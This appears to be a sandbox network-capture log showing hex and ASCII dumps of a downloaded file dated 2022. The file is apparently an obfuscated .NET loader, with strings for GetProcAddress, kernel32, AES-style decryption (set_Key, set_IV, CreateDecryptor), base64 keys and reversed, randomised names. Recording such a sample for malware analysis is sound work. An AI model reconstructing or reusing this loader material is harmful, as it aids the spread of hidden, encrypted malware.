                                                                                                                                                                                                    2022-01-14 03:59:13 UTC95INData Raw: 00 03 00 dd 29 00 00 01 00 dd 29 00 00 01 00 dd 29 00 00 02 00 dd 29 00 00 03 00 dd 29 00 00 04 00 dd 29 00 00 01 00 dd 29 00 00 02 00 dd 29 00 00 03 00 dd 29 00 00 04 00 dd 29 00 00 01 00 dd 29 00 00 02 00 dd 29 00 00 03 00 dd 29 00 00 04 00 dd 29 00 00 01 00 dd 29 00 00 01 00 dd 29 00 00 01 00 dd 29 00 00 02 00 dd 29 00 00 01 00 dd 29 00 00 01 00 dd 29 00 00 02 00 dd 29 00 00 03 00 dd 29 00 20 04 00 dd 29 00 00 05 00 dd 29 00 00 06 00 dd 29 00 00 01 00 dd 29 00 00 02 00 dd 29 00 00 01 00 dd 29 00 00 01 00 dd 29 00 00 01 00 dd 29 00 00 02 00 dd 29 00 00 01 00 dd 29 00 00 02 00 dd 29 00 00 03 00 dd 29 00 00 01 00 dd 29 00 00 02 00 dd 29 00 00 03 00 dd 29 00 00 04 00 dd 29 00 00 01 00 dd 29 00 00 02 00 dd 29 03 00 03 00 dd 29 00 00 04 00 dd 29 02 00 05 00
                                                                                                                                                                                                    Data Ascii: )))))))))))))))))))))) ))))))))))))))))))))
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC98INData Raw: dd 29 00 00 01 00 dd 29 00 00 01 00 dd 29 00 00 02 00 dd 29 10 10 03 00 dd 29 00 00 01 00 dd 29 00 00 01 00 dd 29 00 00 01 00 dd 29 00 00 01 00 dd 29 00 00 02 00 dd 29 00 00 01 00 dd 29 00 00 01 00 dd 29 00 00 01 00 dd 29 00 00 02 00 dd 29 00 00 01 00 dd 29 00 00 02 00 dd 29 00 00 03 00 dd 29 00 00 01 00 dd 29 00 00 02 00 dd 29 00 00 03 00 dd 29 00 00 01 00 dd 29 00 00 02 00 dd 29 00 00 01 00 dd 29 00 00 01 00 dd 29 00 00 01 00 dd 29 00 00 01 00 dd 29 00 00 01 00 dd 29 00 00 02 00 dd 29 00 00 03 00 dd 29 00 00 01 00 dd 29 00 00 02 00 dd 29 00 00 03 00 dd 29 00 00 02 00 dd 29 00 00 01 00 dd 29 00 00 01 00 0a 56 00 00 02 00 0c 56 00 00 01 00 dd 29 00 00 01 00 dd 29 00 00 01 00 dd 29 00 00 01 00 dd 29 00 00 01 00 dd 29 00 00 01 00 dd 29 00 00 01 00 dd 29 00
                                                                                                                                                                                                    Data Ascii: ))))))))))))))))))))))))))))))))))VV)))))))
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC102INData Raw: 00 10 00 0e 00 11 00 0e 00 12 00 0e 00 13 00 0e 00 14 00 0e 00 15 00 0e 00 16 00 0e 00 17 00 0e 00 18 00 0e 00 19 00 0e 00 1a 00 0e 00 25 00 24 00 28 00 27 00 2a 00 29 00 2b 00 29 00 2c 00 2b 00 2d 00 29 00 2e 00 29 00 2f 00 29 00 30 00 29 00 31 00 29 00 32 00 29 00 33 00 29 00 34 00 29 00 35 00 29 00 36 00 29 00 37 00 29 00 38 00 29 00 3b 00 3a 00 3c 00 3a 00 3e 00 3d 00 3f 00 3d 00 40 00 3d 00 41 00 3d 00 42 00 3d 00 43 00 3d 00 44 00 3d 00 45 00 3d 00 46 00 3d 00 47 00 3d 00 48 00 3d 00 49 00 3d 00 4a 00 3d 00 4b 00 3d 00 4c 00 3d 00 4d 00 3d 00 4e 00 3d 00 4f 00 3d 00 50 00 3d 00 51 00 3d 00 52 00 3d 00 53 00 3d 00 54 00 3d 00 55 00 3d 00 56 00 3d 00 57 00 3d 00 58 00 3d 00 59 00 3d 00 5a 00 3d 00 5b 00 3d 00 5c 00 5b 00 5d 00 3d 00 5e 00 3d 00 5f 00
                                                                                                                                                                                                    Data Ascii: %$('*)+),+-).)/)0)1)2)3)4)5)6)7)8);:<:>=?=@=A=B=C=D=E=F=G=H=I=J=K=L=M=N=O=P=Q=R=S=T=U=V=W=X=Y=Z=[=\[]=^=_
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC106INData Raw: 58 49 46 6a 6f 41 72 55 4b 73 00 59 75 62 65 6e 39 71 51 4f 79 43 49 39 4d 35 64 66 31 00 63 62 69 4b 53 31 66 4e 64 4c 59 32 33 61 32 30 64 62 00 6a 36 68 69 66 5a 64 43 4c 35 4e 6c 41 38 50 79 76 63 00 4f 74 39 42 74 50 62 4d 4a 5a 69 72 6b 30 49 79 6b 77 00 43 78 30 58 58 68 6d 45 47 38 44 38 69 56 54 43 37 75 00 6a 4f 61 69 51 42 53 4c 6b 4c 55 55 52 6f 62 6a 55 64 00 41 75 39 31 67 39 4d 43 4b 44 62 47 43 6f 78 47 34 47 00 42 4a 53 50 75 79 39 6e 67 53 53 45 44 70 59 70 33 55 00 77 39 78 75 6c 5a 33 58 39 64 77 66 59 37 34 73 44 49 00 54 43 42 46 75 55 54 70 48 66 54 44 5a 78 54 78 49 4b 00 6f 79 4a 70 59 47 32 77 63 53 51 4e 61 78 43 6c 4e 54 00 74 48 30 45 64 75 65 31 6a 38 4a 76 46 31 4f 31 4d 33 00 76 57 30 63 62 79 42 48 75 67 41 5a 46 69 65 38
                                                                                                                                                                                                    Data Ascii: XIFjoArUKsYuben9qQOyCI9M5df1cbiKS1fNdLY23a20dbj6hifZdCL5NlA8PyvcOt9BtPbMJZirk0IykwCx0XXhmEG8D8iVTC7ujOaiQBSLkLUURobjUdAu91g9MCKDbGCoxG4GBJSPuy9ngSSEDpYp3Uw9xulZ3X9dwfY74sDITCBFuUTpHfTDZxTxIKoyJpYG2wcSQNaxClNTtH0Edue1j8JvF1O1M3vW0cbyBHugAZFie8
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC110INData Raw: 00 46 72 65 65 4c 69 62 72 61 72 79 00 68 4d 6f 64 75 6c 65 00 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 70 72 6f 63 4e 61 6d 65 00 6b 65 72 6e 65 6c 33 32 00 72 6f 74 69 64 45 74 6e 65 6e 6f 70 6d 6f 43 6c 65 64 6f 4d 74 6e 65 6e 6f 70 6d 6f 43 6d 65 74 73 79 53 31 30 30 32 37 00 58 57 33 56 74 6f 67 48 71 48 65 6b 6b 64 58 35 6f 6f 33 00 61 72 67 00 74 6e 65 6d 65 6c 45 6e 6f 69 73 73 65 53 65 6c 62 61 69 6c 65 52 6e 6f 69 74 61 72 75 67 69 66 6e 6f 43 6c 65 64 6f 4d 65 63 69 76 72 65 53 6d 65 74 73 79 53 36 38 31 38 31 00 65 63 69 76 72 65 53 72 65 65 50 73 6c 65 6e 6e 61 68 43 6c 65 64 6f 4d 65 63 69 76 72 65 53 6d 65 74 73 79 53 34 33 34 35 37 00 72 6f 72 72 45 65 6c 69 70 6d 6f 43 79 72 65 75 51 72 65 68 63 74 61 70 73 69 44 6c 65 64 6f 4d 65 63
                                                                                                                                                                                                    Data Ascii: FreeLibraryhModuleGetProcAddressprocNamekernel32rotidEtnenopmoCledoMtnenopmoCmetsyS10027XW3VtogHqHekkdX5oo3argtnemelEnoisseSelbaileRnoitarugifnoCledoMecivreSmetsyS68181ecivreSreePslennahCledoMecivreSmetsyS43457rorrEelipmoCyreuQrehctapsiDledoMec
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC114INData Raw: 46 00 46 69 6c 65 53 74 72 65 61 6d 00 46 69 6c 65 4d 6f 64 65 00 46 69 6c 65 41 63 63 65 73 73 00 46 69 6c 65 53 68 61 72 65 00 6c 6b 70 36 39 71 5a 47 63 00 4e 69 58 54 41 32 48 58 37 00 54 6f 41 72 72 61 79 00 73 31 46 65 43 49 54 44 67 00 73 65 74 5f 4b 65 79 00 73 65 74 5f 49 56 00 43 72 65 61 74 65 44 65 63 72 79 70 74 6f 72 00 57 72 69 74 65 00 7a 6c 58 58 6f 63 43 6c 69 00 67 65 74 5f 4f 66 66 73 65 74 54 6f 53 74 72 69 6e 67 44 61 74 61 00 77 4e 31 63 64 52 79 54 53 00 53 74 61 72 74 73 57 69 74 68 00 67 65 74 5f 43 68 61 72 73 00 4d 71 55 4b 55 67 6a 62 45 00 72 74 36 73 58 58 68 65 31 00 61 44 4b 71 78 59 71 5a 6f 00 4b 34 79 78 4c 4a 72 74 4b 00 75 76 4b 79 64 42 6a 76 34 00 75 33 54 47 46 51 42 65 78 00 6d 66 76 42 64 70 68 58 79 00 76 53 33
                                                                                                                                                                                                    Data Ascii: FFileStreamFileModeFileAccessFileSharelkp69qZGcNiXTA2HX7ToArrays1FeCITDgset_Keyset_IVCreateDecryptorWritezlXXocCliget_OffsetToStringDatawN1cdRyTSStartsWithget_CharsMqUKUgjbErt6sXXhe1aDKqxYqZoK4yxLJrtKuvKydBjv4u3TGFQBexmfvBdphXyvS3
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC118INData Raw: 45 56 51 43 58 00 4e 30 35 68 76 51 48 74 4f 58 00 6c 50 6e 68 52 55 6b 74 32 54 00 63 44 30 68 4e 35 32 6e 4c 48 00 73 4a 33 68 72 50 57 78 58 37 00 56 61 76 68 62 34 30 41 73 37 00 52 65 6b 68 50 33 41 70 6d 30 00 61 59 73 68 36 35 62 44 69 63 00 52 37 6c 68 54 5a 31 42 70 5a 00 48 49 50 39 54 34 4f 4a 67 79 69 44 72 4e 61 75 66 47 59 00 47 52 49 38 42 4b 6a 4c 70 56 00 66 6e 38 38 43 6f 6f 75 67 67 00 75 67 53 38 78 79 43 67 67 66 00 69 48 49 38 44 37 49 47 79 50 00 50 66 4a 38 31 76 44 38 44 79 00 65 4e 64 38 67 6b 55 67 4b 47 00 43 41 6d 38 61 48 4c 32 56 46 00 66 77 72 68 44 73 74 51 6a 6e 00 4c 42 36 38 6c 66 51 76 75 74 00 41 6c 79 38 38 33 50 6e 32 4e 00 65 43 52 38 69 70 48 4a 39 35 00 4d 58 68 68 34 38 45 54 6c 64 00 6f 6f 75 38 37 6a 68 55 55
                                                                                                                                                                                                    Data Ascii: EVQCXN05hvQHtOXlPnhRUkt2TcD0hN52nLHsJ3hrPWxX7Vavhb40As7RekhP3Apm0aYsh65bDicR7lhTZ1BpZHIP9T4OJgyiDrNaufGYGRI8BKjLpVfn88CoouggugS8xyCggfiHI8D7IGyPPfJ81vD8DyeNd8gkUgKGCAm8aHL2VFfwrhDstQjnLB68lfQvutAly883Pn2NeCR8ipHJ95MXhh48ETldoou87jhUU
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC122INData Raw: 6c 00 57 53 4b 6c 7a 6f 44 6f 30 53 00 6e 77 57 55 30 76 46 75 36 35 00 61 6a 69 55 31 43 73 74 50 54 00 6f 35 44 55 48 46 4d 70 34 44 00 68 56 34 55 66 75 49 77 4d 50 00 71 6d 74 55 49 41 39 66 4a 47 00 44 47 69 55 6d 32 70 78 70 48 00 4d 30 53 6d 36 47 5a 30 59 4d 49 69 55 6e 39 62 6a 63 54 00 74 43 44 69 78 78 63 48 6e 50 00 72 48 4f 69 79 68 73 79 72 34 00 6c 36 44 69 47 75 37 44 41 36 00 54 61 72 67 65 74 49 6e 76 6f 63 61 74 69 6f 6e 45 78 63 65 70 74 69 6f 6e 00 4b 69 34 69 42 36 36 4c 48 56 00 70 6f 77 69 4c 34 38 54 73 73 00 58 74 61 69 46 6c 38 61 64 6f 00 4f 4b 47 69 57 6b 70 66 76 42 00 4c 61 6f 69 6e 57 4a 51 53 45 00 43 6f 6e 73 74 72 75 63 74 6f 72 49 6e 66 6f 00 4f 76 65 72 66 6c 6f 77 45 78 63 65 70 74 69 6f 6e 00 73 65 74 5f 49 74 65 6d
                                                                                                                                                                                                    Data Ascii: lWSKlzoDo0SnwWU0vFu65ajiU1CstPTo5DUHFMp4DhV4UfuIwMPqmtUIA9fJGDGiUm2pxpHM0Sm6GZ0YMIiUn9bjcTtCDixxcHnPrHOiyhsyr4l6DiGu7DA6TargetInvocationExceptionKi4iB66LHVpowiL48TssXtaiFl8adoOKGiWkpfvBLaoinWJQSEConstructorInfoOverflowExceptionset_Item
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC127INData Raw: 38 64 61 63 33 36 36 64 00 6d 5f 65 37 32 35 31 62 34 65 34 64 38 34 34 64 32 64 39 63 36 62 36 66 66 63 38 38 66 31 37 36 63 30 00 6d 5f 39 34 30 30 36 62 61 39 39 37 61 31 34 38 63 65 38 66 32 64 63 36 34 39 30 36 33 39 34 62 35 30 00 6d 5f 66 62 38 61 64 37 36 66 61 39 61 37 34 37 31 65 38 62 31 65 30 32 61 34 30 37 37 66 66 30 62 63 00 6d 5f 33 61 61 33 63 61 64 39 30 64 63 65 34 31 31 31 38 31 64 33 37 61 34 64 61 39 61 61 64 61 65 33 00 6d 5f 64 66 64 64 61 34 31 35 61 36 62 36 34 30 37 34 39 65 39 35 33 64 31 63 35 31 64 39 38 33 33 38 00 6d 5f 38 33 62 37 62 37 66 63 35 65 38 65 34 34 63 62 61 38 61 37 63 63 31 30 36 37 37 63 31 35 61 35 00 6d 5f 30 36 33 30 33 61 34 31 36 37 64 36 34 63 36 30 39 37 32 33 62 65 32 64 63 33 35 61 64 65 30 30 00 6d
                                                                                                                                                                                                    Data Ascii: 8dac366dm_e7251b4e4d844d2d9c6b6ffc88f176c0m_94006ba997a148ce8f2dc64906394b50m_fb8ad76fa9a7471e8b1e02a4077ff0bcm_3aa3cad90dce411181d37a4da9aadae3m_dfdda415a6b640749e953d1c51d98338m_83b7b7fc5e8e44cba8a7cc10677c15a5m_06303a4167d64c609723be2dc35ade00m
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC130INData Raw: 38 00 73 65 33 68 48 59 61 51 54 39 00 73 45 4c 68 52 73 41 4e 75 30 00 59 45 6e 68 46 67 6a 4b 64 78 00 44 4d 41 68 74 56 64 4b 66 59 00 4f 69 59 68 35 75 46 79 37 67 00 45 56 77 67 31 4c 53 58 35 64 00 4d 37 55 68 34 4e 38 65 6b 72 00 6e 55 65 68 65 50 62 6e 6d 73 00 46 36 6c 68 42 58 42 77 58 38 00 6b 6e 4a 68 7a 55 48 4f 46 73 00 44 56 58 67 68 4e 4b 35 54 50 00 41 75 31 67 4f 79 47 65 76 35 00 63 76 6c 67 5a 6b 43 42 39 6c 00 78 77 31 67 49 77 43 41 78 74 00 48 36 71 67 76 6b 46 32 41 50 00 54 36 39 67 6c 72 79 76 73 47 00 4e 48 4c 67 4a 37 69 37 6a 77 00 4b 71 6d 67 6b 38 4f 4e 39 6d 00 42 69 6e 64 65 72 00 54 6f 43 68 61 72 41 72 72 61 79 00 46 72 6f 6d 42 61 73 65 36 34 43 68 61 72 41 72 72 61 79 00 54 6f 43 68 61 72 00 41 70 70 65 6e 64 00 49 6e
                                                                                                                                                                                                    Data Ascii: 8se3hHYaQT9sELhRsANu0YEnhFgjKdxDMAhtVdKfYOiYh5uFy7gEVwg1LSX5dM7Uh4N8ekrnUehePbnmsF6lhBXBwX8knJhzUHOFsDVXghNK5TPAu1gOyGev5cvlgZkCB9lxw1gIwCAxtH6qgvkF2APT69glryvsGNHLgJ7i7jwKqmgk8ON9mBinderToCharArrayFromBase64CharArrayToCharAppendIn
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC134INData Raw: 61 00 72 00 41 00 72 00 72 00 61 00 79 00 00 0f 52 00 65 00 70 00 6c 00 61 00 63 00 65 00 00 17 54 00 6f 00 43 00 68 00 61 00 72 00 41 00 72 00 72 00 61 00 79 00 00 0d 4c 00 65 00 6e 00 67 00 74 00 68 00 00 07 47 00 65 00 74 00 00 59 4c 00 35 00 68 00 64 00 58 00 6c 00 53 00 61 00 44 00 57 00 31 00 59 00 73 00 4b 00 4f 00 44 00 79 00 2f 00 58 00 42 00 79 00 4d 00 59 00 53 00 6a 00 57 00 47 00 68 00 52 00 65 00 45 00 2b 00 45 00 41 00 6c 00 32 00 48 00 73 00 74 00 59 00 51 00 53 00 4d 00 3d 00 00 31 2f 00 4d 00 74 00 59 00 4c 00 4d 00 67 00 30 00 37 00 63 00 4f 00 33 00 44 00 31 00 61 00 2f 00 58 00 76 00 34 00 2b 00 43 00 67 00 3d 00 3d 00 00 1b 74 00 69 00 42 00 72 00 6d 00 6b 00 68 00 57 00 54 00 79 00 4e 00 59 00 64 00 00 80 9d 53 00 79 00 73 00 74 00
                                                                                                                                                                                                    Data Ascii: arArrayReplaceToCharArrayLengthGetYL5hdXlSaDW1YsKODy/XByMYSjWGhReE+EAl2HstYQSM=1/MtYLMg07cO3D1a/Xv4+Cg==tiBrmkhWTyNYdSyst
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC138INData Raw: 18 18 09 09 09 0a 00 05 08 18 18 1d 05 09 10 18 06 00 03 0e 0e 0e 0e 08 00 04 08 18 08 08 10 08 06 00 03 18 09 08 09 04 00 01 08 18 03 00 00 18 05 00 02 02 18 18 0a 07 05 1d 05 12 81 6d 08 08 08 0d 20 04 01 0e 11 81 71 11 81 75 11 81 79 05 00 00 12 80 ad 07 00 01 1d 05 12 80 ad 08 07 02 12 80 ad 12 80 f9 05 20 00 12 80 a1 07 20 03 01 1d 05 08 08 04 00 01 08 0e 0b 07 06 0f 03 45 0e 08 08 08 0f 03 05 00 02 02 0e 0e 06 07 04 02 02 08 08 04 20 01 02 0e 04 20 01 03 08 07 07 04 1d 05 08 08 08 06 07 03 1d 05 08 08 05 00 02 18 18 08 06 00 03 01 18 08 0a 07 00 04 01 1c 08 18 08 03 00 00 1c 05 00 00 12 81 4d 05 20 00 12 81 49 04 00 01 18 1c 06 00 03 18 18 1c 09 07 00 02 12 80 91 1c 02 07 00 02 12 80 91 0e 02 09 00 02 02 12 80 91 12 80 91 05 20 00 12 81 7d 05 20 00
                                                                                                                                                                                                    Data Ascii: m quy E M I }
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC142INData Raw: 0a 00 02 1d 12 81 1d 1c 12 82 68 04 06 12 82 6c 06 20 01 12 80 91 1c 09 00 02 12 80 91 1c 12 82 6c 04 06 12 82 70 07 00 02 02 1c 12 82 70 04 06 12 82 74 09 20 02 02 12 80 91 12 80 91 0c 00 03 02 12 80 91 12 80 91 12 82 74 04 06 12 82 78 04 20 01 05 1c 07 00 02 05 1c 12 82 78 04 06 12 82 7c 04 20 01 0a 1c 07 00 02 0a 1c 12 82 7c 04 06 12 82 80 04 20 01 0c 1c 07 00 02 0c 1c 12 82 80 04 06 12 82 84 04 20 01 0d 1c 07 00 02 0d 1c 12 82 84 04 06 12 82 88 07 20 02 12 80 ad 1c 0e 0a 00 03 12 80 ad 1c 0e 12 82 88 04 06 12 82 8c 06 20 02 1d 05 1c 08 09 00 03 1d 05 1c 08 12 82 8c 04 06 12 82 90 08 20 01 12 80 91 12 80 91 0b 00 02 12 80 91 12 80 91 12 82 90 04 06 12 82 94 07 20 02 1c 12 80 91 08 0a 00 03 1c 12 80 91 08 12 82 94 04 06 12 82 98 07 20 02 1c 12 80 91 09
                                                                                                                                                                                                    Data Ascii: hl lppt tx x| |
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC146INData Raw: 9e 83 48 39 ad 17 52 14 f5 84 c3 66 6b 17 fa 7c 1e 81 92 ff 9e cb 0e c2 5b 6f a7 af d4 aa d4 aa 33 ec 21 e9 08 2e e4 dc 76 b9 53 51 55 e4 d3 63 a4 73 ce 4c 4b cf 85 09 56 54 5e d3 95 97 08 bd 41 f8 86 ea ee 9a 2e b1 e6 1d ac 0b 56 a8 03 0e 74 16 b5 c4 e8 7b 31 c8 34 04 74 45 e5 60 a9 06 9a 8b ad f9 8f fc c7 ab 58 3f e3 55 e2 dd 1f c1 df a7 48 81 1a fc ab 92 ca 62 68 ff 56 ca 2c 23 36 41 82 85 ab 94 86 69 50 6d e2 b4 10 20 c3 96 c9 08 0d df 4d 5b 03 69 45 91 6f 05 8c dc 66 8c 2c a9 f5 71 fa 9e c6 0b 97 38 6a e6 ed ee 8e 58 70 a2 5d 02 97 36 e3 da fb 76 74 ff ad 2e 3d 4d 97 44 a2 48 68 ad 6e f4 fb e1 26 28 3a 5e 8d 41 18 86 3b e7 41 52 5b ba d8 44 53 03 b7 88 9d 4f de 82 f2 94 60 b8 9b 6f 6f ba 87 d6 6a ff f3 87 be a1 6e 6b 01 06 d9 02 09 21 14 77 2e c1 2c
                                                                                                                                                                                                    Data Ascii: H9Rfk|[o3!.vSQUcsLKVT^A.Vt{14tE`X?UHbhV,#6AiPm M[iEof,q8jXp]6vt.=MDHhn&(:^A;AR[DSO`oojnk!w.,
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC150INData Raw: 6e cc 01 80 95 af a8 02 81 a1 43 c4 2f 35 41 2d da 05 dc 20 70 9c ea 68 d8 89 eb c6 25 21 20 e0 52 e9 ff ac 3b e4 f0 29 9d bc 67 9e 0a 24 1e b3 01 11 1c d3 17 f8 78 95 54 e0 01 d1 d4 44 0b ca 43 ba 7e c2 3e eb 99 39 9c 1e d3 67 55 d1 3b fb 83 24 a8 56 93 fd 57 f4 49 85 a4 a1 7e 4d 10 64 3b 9a 10 87 ae 97 4b 0e cd 98 14 0a 8a 68 f2 6e 21 1b 68 69 6d b6 93 d1 b7 8a c0 8d 25 d8 0f 9a 33 08 e8 8e 27 59 0d 0e eb d6 98 c9 ea 4f b3 25 db c1 e2 07 85 02 2f f2 31 65 12 56 b3 98 13 5e 57 9c bb 3c b8 32 50 e1 67 9a 5c b9 6d 78 77 75 b4 db 04 5c 54 88 18 c4 fc 53 0f 6e f6 c1 63 7a bd 29 70 50 c9 fb 26 fb 93 ce ec e9 59 32 66 8d 75 2d 6d 09 a0 4d 03 d0 7e 75 26 14 d5 a1 64 b0 99 da 0e 93 17 77 29 cf c2 34 f9 fe ec 5c b6 df f7 a7 d9 0e 47 7f 29 66 61 b6 98 ef 03 a8 1f
                                                                                                                                                                                                    Data Ascii: nC/5A- ph%! R;)g$xTDC~>9gU;$VWI~Md;Khn!him%3'YO%/1eV^W<2Pg\mxwu\TSncz)pP&Y2fu-mM~u&dw)4\G)fa
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC154INData Raw: 8c d3 c7 84 4d a5 49 c4 2d 8b 4f cc 3e 6b ac 87 25 b4 51 ff 69 63 2e 43 61 f4 3c 2d d4 a4 ea 4f 5c 2f ab 92 ca 11 31 40 32 5b 32 96 07 ef bd 22 8a d3 84 df 9d e1 75 6e d4 ed 18 e9 a1 a6 29 77 5d 47 6f 66 48 13 6a ac a5 3a 10 ba be d7 c3 13 f0 bb 2a 76 8e 27 98 a2 7b 8e a7 1a 9c 2b 72 b5 50 46 af c8 78 ca 18 81 c3 30 94 f2 39 27 2d e2 0b 63 a1 4b 30 a7 11 40 04 18 41 fe b0 79 7f 66 ea c3 f9 1c af c5 b6 23 ab 13 d2 b1 5f 04 cb 2d 8e d7 fe b7 87 a2 ea 4d 29 a7 b6 c0 00 22 2d b5 42 ed 55 47 4f 95 a5 d3 2b a6 8b 5d b7 91 76 94 f4 8d 38 95 55 0a 7b 23 9e b2 2d 31 be b2 6c f0 de 7c 59 b4 ff 78 60 4b 71 e1 5f 3e 0c 75 cb fe c1 9f 20 27 78 44 4c b1 96 a2 d4 df 31 54 5b 65 fb 15 ff 26 04 c9 06 71 81 64 60 24 9a 64 67 a9 cc 88 5f b1 d2 05 3c 0a 14 f8 a9 06 f3 64 64
                                                                                                                                                                                                    Data Ascii: MI-O>k%Qic.Ca<-O\/1@2[2"un)w]GofHj:*v'{+rPFx09'-cK0@Ayf#_-M)"-BUGO+]v8U{#-1l|Yx`Kq_>u 'xDL1T[e&qd`$dg_<dd
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC159INData Raw: 69 1b 4e 75 1c a9 9e c6 03 7c 1e d5 c4 b6 48 f4 37 96 f7 ad 15 2a a7 1b 6a 7e 4f b7 12 11 3d a8 c2 27 d8 ab e2 98 86 62 8d 44 dd b8 16 b8 cc 41 ba b4 5e 8f 25 86 0f e3 be 80 11 e8 f6 ca 14 06 da 5c f3 01 20 31 0a 6c ba 6c e8 f4 32 55 54 ed f9 c4 97 7d 8a 01 65 cd 66 51 1e c4 68 f3 8b 48 8a bb 6e 14 47 86 e4 25 dc 5d dc 7b ed 2e 5e 74 d1 17 9e 36 29 cb a3 cc 1f 8d 49 92 ee 47 d2 3d b3 ca 3f 0e b5 d3 bb 3d 6a 52 2d 23 97 22 67 1b d8 22 1a 12 5e 3e bb 45 06 42 3e 69 dc ee 7c 6e 59 e7 bb 95 c9 97 d6 78 6a 33 3f 5d d0 4d ee f1 f0 64 d1 07 82 98 15 95 6a 81 c2 69 3b ef 12 a1 27 0b 4b d2 cd 58 95 8f 0f 5d 9c fb 66 19 ce 82 2c 65 df b6 4f 10 be ad 6c 75 d2 4a 63 95 a8 6e 43 ce 9c 4a 3d e7 b7 b6 35 d2 49 54 54 e8 93 e4 83 e3 69 d4 00 51 ee c5 63 10 f7 37 94 18 2d
                                                                                                                                                                                                    Data Ascii: iNu|H7*j~O='bDA^%\ 1ll2UT}efQhHnG%]{.^t6)IG=?=jR-#"g"^>EB>i|nYxj3?]Mdji;'KX]f,eOluJcnCJ=5ITTiQc7-
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC162INData Raw: 46 66 57 be ea af a6 12 21 0a 44 bf ee b1 4d a1 50 c7 da c7 1b 5e 5f 6d 4b 1d e9 93 d7 06 ec 23 6b 71 91 69 fc 00 5b 61 68 fb cb d5 cd 25 3f 64 4a 7b d1 68 35 59 fe ae fd 34 3e 73 c1 2f 9c 9d 8d 5d 64 cc 69 67 40 c1 54 10 3f c7 6e a0 b9 c7 75 5e 50 08 9e 17 ce 78 8c a3 ff a2 40 c9 10 57 75 a8 ff f1 d8 f6 c0 a6 d3 6a e6 68 8c b3 73 96 76 b0 f4 a5 61 34 1c c9 ef 3e a1 2c 00 48 e2 53 a3 7d 91 f5 00 17 28 a5 0e 32 78 9a 9a 5c df 10 8b 79 65 4d 04 45 aa 61 ec ef 2e 80 b6 80 10 88 cc f9 da a0 6e 05 52 13 87 90 1d c0 5d 99 5f e6 28 4e 04 1d 62 08 9d 4f a5 42 87 2c f0 47 3d ef 95 75 97 07 2c 9d 5d 52 8e ae 8e b4 61 4c 74 bb 98 9b 8e b3 ac a9 79 f1 75 30 be 83 16 1c 68 c8 19 8e 80 93 25 7b b9 ef 01 7d 9e d0 bb 8c 3f c5 d6 fc b9 cf d9 52 d4 fb 0c 1f d7 32 61 98 fa
                                                                                                                                                                                                    Data Ascii: FfW!DMP^_mK#kqi[ah%?dJ{h5Y4>s/]dig@T?nu^Px@Wujhsva4>,HS}(2x\yeMEa.nR]_(NbOB,G=u,]RaLtyu0h%{}?R2a
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC166INData Raw: d2 48 02 94 a8 47 40 15 5d ea 81 43 c9 5d 61 7d 05 15 95 31 cb 91 15 80 14 ba 30 f5 93 02 54 88 9b b0 0b 8c 76 4c 95 a5 4d 01 26 09 f1 e1 08 d6 7b 60 19 f6 0e 2e 4e f6 ea 2d 4f a7 d2 4b 35 b3 77 d3 76 ea 04 30 57 ce 76 e0 26 23 a3 f9 73 89 d7 d0 71 85 88 72 4e 63 2a 82 33 55 9c 12 1c 5a f5 0c 19 5d 9b df 89 97 00 3f b7 ce 60 9c c9 cc e1 f6 e0 8f 73 50 e9 2b b6 51 98 39 d6 64 ea 03 ce 4e 3f 62 eb 60 60 2a e2 f2 17 d7 f2 7a 93 28 ee c0 6c a6 8f ae 9d db 3d 68 77 1c d3 2f 56 2b 08 e9 a8 81 34 9a df 02 e4 e5 69 30 e5 7e 78 c3 2a ed 71 2f b0 a4 24 b1 f7 12 d1 39 fb 7b 06 c1 f5 3f 3a 2d f8 5e 0d a0 6d 81 da 09 f4 3a 35 dc b6 4b cd ed 55 f2 e3 18 1d 92 e9 4e ba 1f 53 1a 7a 49 4a ad fb 59 ab 73 84 f8 1e d8 7d ce 0f 0b a7 3b af 91 aa e8 7f b2 b7 90 11 1c 12 26 b8
                                                                                                                                                                                                    Data Ascii: HG@]C]a}10TvLM&{`.N-OK5wv0Wv&#sqrNc*3UZ]?`sP+Q9dN?b``*z(l=hw/V+4i0~x*q/$9{?:-^m:5KUNSzIJYs};&
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC170INData Raw: 0b db 9e ad 09 7b 84 e4 5f 27 56 84 f7 b2 ca 86 24 4b e2 2d 9a 9f 63 bd 2f b1 ef c7 00 f3 8e 2c d7 7f 01 9c 57 d2 43 9b 27 ad 8b 63 15 75 88 5a d7 5c 82 84 f2 d5 f2 60 7a 54 87 8e 1b bf 6a 0d 49 01 90 14 23 b5 ef 65 26 c9 26 b2 ea b7 56 6b 7b dc 46 b3 0b fe 3b 19 7d 15 e4 fb 2f f8 57 0a 6b 23 06 2e 43 cb f6 35 b2 93 cc 18 4b 95 6d 3c 77 9c e8 6b 75 81 91 bf 26 47 19 43 8b a4 ee cc fa db 60 51 3f c2 89 03 17 4c d6 e3 33 16 5f 54 96 6d bf e7 c4 e1 82 fe 44 7c 77 7f 20 9c 00 2b 31 18 d2 03 d7 e7 2e 18 08 33 8d ac 92 f4 87 bd d9 ae 37 3b 5c 2b ff 6d b3 ba 58 f6 23 8b 2c 3f bc 6d 23 94 f0 0d b6 3b e4 70 c7 61 4f dc 1f c8 a8 42 6f 70 bc 69 1b f7 6f 91 f4 7a 9d 67 66 98 a4 08 65 9b bc c4 d1 93 b5 b0 76 f0 b2 d7 12 b2 cc 50 1c 80 e6 7f 6b cd 61 52 08 58 c2 3d fb
                                                                                                                                                                                                    Data Ascii: {_'V$K-c/,WC'cuZ\`zTjI#e&&Vk{F;}/Wk#.C5Km<wku&GC`Q?L3_TmD|w +1.37;\+mX#,?m#;paOBopiozgfevPkaRX=
